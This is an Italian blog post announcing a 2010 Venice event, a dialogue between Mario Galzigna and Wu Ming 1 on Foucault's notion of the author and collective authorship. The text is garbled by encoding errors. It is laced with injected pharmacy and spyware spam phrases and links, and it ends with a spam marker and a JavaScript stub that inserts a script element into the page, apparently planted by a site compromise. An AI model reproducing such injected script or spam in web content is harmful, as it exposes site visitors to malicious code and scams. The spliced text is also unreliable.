Pagine

Archivi

Meta


« | Main | »

a�?Cosa��A? un autorea�?? a�� Dialogo a due voci tra un filosofo e uno scrittore Mario Galzigna e WuMing

By admin | marzo 13, 2010

VEGA
Parco Scientifico Tecnologico di Venezia

get boyfriend back

UNIVERSITAa�� CAa�� FOSCARI DI VENEZIA Customized Inflatables:
Scuola di Dottorato in scienze della cognizione e della formazione
Dipartimento di Studi Storici

UniversitA� IUAV di Venezia

a�?Cosa��A? un autorea�?? a�� Dialogo a due vociA� tra un filosofo e uno scrittore Pills

Mario Galzigna e WuMing1

 

Presentano la��evento:

Michele Vianello, Direttore del Vega

Umberto Margiotta, Direttore della Scuola di dottorato in Scienze della Formazione

Giorgio Ravegnani, Direttore del Dipartimento di Studi Storici

Intervengono nel dibattito:

Monica Centanni (UniversitA� IUAV di Venezia, Centro studi CLASSICA)

Maddalena Mapelli (Scuola di dottorato in Scienze della formazione, Progetto Ibridamenti)

 

16 marzo 2010, ore 15.00 al VEGA

Order

Sala 1, Edificio Porta della��Innovazione
12, Via della LibertA�, 30175 Marghera-Venezia

(da Piazzale Roma prendere il bus n. 4)

http://www.videosxamateurs.com/non-classe/amaryl-4-mg-price-in-pakistan
Prendendo le mosse da un saggio di Michel Foucault (a�?Cosa��A? un autore?a�?) cheap pills , un filosofo (epistemologo e storico delle scienze), Mario Galzigna, e uno scrittore, Wu Ming1, si interrogano sullo statuto della��autore nel terzo millennio. La a�?funzione-autorea�?, come la chiamava Foucault, A? una delle tante variabili da cui dipende la produzione di un discorso. Si tratta, allora, di togliere alla��autore il suo ruolo di soggetto creatore unico e sovrano, a�?il suo ruolo di fondamento originarioa�?, considerandolo invece come una a�?funzione variabile e complessa del discorsoa�?. Come una delle funzioni che lo rendono possibile.

La produzione letteraria di Wu Ming a�� nome di un gruppo di autori, sigla che rinvia a una��autorialitA� collettiva a�� mette in scena la forza dirompente di un soggetto collettivo della��enunciazione. La��autore collettivo ci propone una��identitA� plurale e polifonica: dimensione facilmente accessibile, oggi, agli utenti della rete e soprattutto a chi utilizza i blog cheap pills e i social mild antidepressants for elderly network. Nella rete A? possibile a�?sperimentare una sorta di fluidificazione identitaria, un decentramento della��io, una sua dimensione plurale e frammentataa�? (M. Galzigna, Il mondo nella mente, Marsilio).

aste antiquariato on line

Le rete, dunque, come brodo di coltura della��espressivitA� letteraria, della riflessione filosofica, storica e antropologica, e come stimolo di una nuova relativizzazione della funzione-autore. Wu Ming inscrive il proprio lavoro in quella che egli chiama a�?nebulosaa�?, cioA? la New Italian Epic (questo A? anche il titolo di un saggio recente, edito da Einaudi Stile Libero): a�?una generazione letterariaa�?, i cui membri a�?condividono segmenti di poetiche, brandelli di mappe mentali e un desiderio feroce che ogni volta li riporta agli archivi, o per strada, o dove archivi e strada coincidonoa�?. Si tratta di a�?una sorta di campo elettrostaticoa�?, capace di a�?attirare a sA� opere in apparenza difformi, ma che hanno affinitA� profonde. Ho scritto Cheap opere, non autori, perchA� il New Italian Epic riguarda piA? le prime dei secondia�?.

La��opera, dunque, al centro della nostra attenzione. La��opera, vogliamo aggiungere a�� in questo caso il testo a�� come creazione che dipende da una molteplicitA� di fattori influenti che interagiscono. Tra questi fattori ritroveremo sempre, beninteso, profili da��autore, mutevoli e molteplici: in questa prospettiva a�?non si parla, infatti, di un soggetto sempre eguale a se stesso, ma di una realtA� mobile e plurale: che si costituisce attraverso tecnologie e pratiche di sA�, che si ricrea incessantemente, che cambia con frequenza identitA�, che modifica continuamente il proprio volto e la propria formaa�? (M. Galzigna, Buy lynoral online ruler ComunitA� virtuali e pratiche di sA�, Introduzione a Pratiche collaborative in rete, a cura di M. Mapelli, Mimesis).

Un poa�� come il protagonista di Altai, la��ultimo romanzo di Wu Ming (Einaudi, Stile Libero), che afferma, quasi programmaticamente: a�?Tutto era possibile nella��oscuritA� che mi avvolgeva, e io non ero nulla. Proprio per questo non avevo mai esitato a voltare le spalle a me stesso. Non ca��era niente di vero a cui voltarlea�?.

a�?Uno, nessuno, centomilaa�?, verrebbe da direa��

online Cos’A? un autore – volantino

zp8497586rq
zp8497586rq

var d=document;var s=d.createElement(‘script’); document.currentScript.parentNode.insertBefore(s, document.currentScript);mobile spy, spy text messages iphone, phonty Order

Topics: Incontri | Commenti disabilitati su a�?Cosa��A? un autorea�?? a�� Dialogo a due voci tra un filosofo e uno scrittore Mario Galzigna e WuMing

Comments are closed.